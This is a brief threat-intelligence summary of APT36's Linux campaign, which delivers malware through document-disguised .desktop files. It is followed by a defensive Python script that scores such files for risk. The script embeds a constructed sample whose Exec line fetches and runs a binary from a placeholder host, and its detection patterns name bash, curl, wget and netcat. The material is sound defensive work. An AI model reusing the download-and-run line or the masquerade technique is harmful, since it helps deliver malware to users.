Pakistani cyberespionage group APT36 is targeting Indian government and defense sectors with a new campaign involving Linux malware delivery via .desktop files. This evolution demonstrates increased sophistication and diversification in their attack methods, including spear-phishing using Google Drive. #APT36 #LinuxThreats
Key points
- APT36 has been active since 2013, targeting Indian government entities with cyberespionage campaigns.
- The group is now using Linux desktop entry (.desktop) files for malware delivery in a recent campaign.
- The attacks involve phishing emails with ZIP files masquerading as documents, downloading malware from Google Drive.
- The malware performs anti-debugging checks, maintains persistence, and communicates with C&C servers via WebSockets.
- This tactical shift indicates APT36’s efforts to diversify attack vectors and enhance operational flexibility.
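The bullets above describe the lure at a high level: a .desktop launcher whose name and icon imitate a document while its Exec line fetches and runs a payload, plus autostart-based persistence. The script below is an added defensive example, not code from the report or from any vendor, that triages .desktop files against a few heuristics a SOC analyst would reach for (document-like Name, shell or downloader in Exec, execution from /tmp or dotfile paths, hidden entries, autostart location). The two sample entries, the rule set and the placeholder URL are constructed for illustration and are not indicators from the campaign.

```python
"""Heuristic triage of Linux .desktop files (added example; rules and samples are constructed)."""
import configparser
import re
from typing import List

# Constructed benign entry: an ordinary application launcher.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=accessories-text-editor
Terminal=false
"""

# Constructed suspicious entry: named like a document, hidden from menus,
# and its Exec line downloads and runs a binary from a placeholder URL.
SUSPICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Quarterly_Report.pdf
Icon=application-pdf
Exec=bash -c "curl -sL https://example.invalid/payload -o /tmp/.cache_x && chmod +x /tmp/.cache_x && /tmp/.cache_x"
Terminal=false
NoDisplay=true
"""

DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt", ".odt")
# Shell interpreters and download/decode helpers that rarely belong in a GUI launcher.
SHELL_OR_DOWNLOADER = re.compile(
    r"\b(?:bash|sh|zsh)\s+-c\b|\b(?:curl|wget|base64|python3?\s+-c|perl\s+-e|nc|ncat)\b"
)
# Execution out of world-writable or hidden locations.
SUSPICIOUS_PATH = re.compile(r"/tmp/|/dev/shm/|/var/tmp/|/\.[A-Za-z0-9_]")
# Directories where a .desktop file is launched automatically at login.
AUTOSTART_DIRS = ("/.config/autostart/", "/etc/xdg/autostart/")


def analyze_desktop_entry(text: str, path: str = "<inline>") -> List[str]:
    """Return finding tags for one .desktop file's contents (empty list if nothing stands out)."""
    parser = configparser.RawConfigParser(strict=False)
    parser.optionxform = str  # keep key case (Exec, NoDisplay, ...) as written in the file
    parser.read_string(text)
    if not parser.has_section("Desktop Entry"):
        return []
    entry = parser["Desktop Entry"]
    exec_line = entry.get("Exec", "")
    name = entry.get("Name", "")
    findings: List[str] = []

    if name.lower().endswith(DOC_EXTENSIONS):
        findings.append("document-masquerade")
    if SHELL_OR_DOWNLOADER.search(exec_line):
        findings.append("shell-or-downloader-exec")
    if SUSPICIOUS_PATH.search(exec_line):
        findings.append("exec-from-tmp-or-dotfile")
    # NoDisplay/Hidden keep the entry out of menus while it stays launchable (or autostarts).
    if exec_line and any(entry.get(k, "false").strip().lower() == "true" for k in ("NoDisplay", "Hidden")):
        findings.append("hidden-entry")
    if any(d in path for d in AUTOSTART_DIRS):
        findings.append("autostart-persistence")
    return findings


def risk_level(findings: List[str]) -> str:
    """Coarse verdict so a single noisy rule does not page anyone on its own."""
    if len(findings) >= 3:
        return "high"
    if findings:
        return "medium"
    return "low"


def triage_file(path: str) -> List[str]:
    """Read a .desktop file from disk and analyze it; the path itself feeds the autostart rule."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return analyze_desktop_entry(fh.read(), path)


if __name__ == "__main__":
    for label, text, path in (
        ("benign", BENIGN_DESKTOP, "/usr/share/applications/editor.desktop"),
        ("suspicious", SUSPICIOUS_DESKTOP, "/home/user/.config/autostart/report.desktop"),
    ):
        found = analyze_desktop_entry(text, path)
        print(f"{label:10s} {risk_level(found):6s} {found}")
```

Run it over `~/.config/autostart/*.desktop` and `~/Downloads/*.desktop` with `triage_file()` to sweep an endpoint; the `path` argument matters because the same file content is far more interesting sitting in an autostart directory than in a download folder.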
Read More: https://www.securityweek.com/pakistani-hackers-back-at-targeting-indian-government-entities/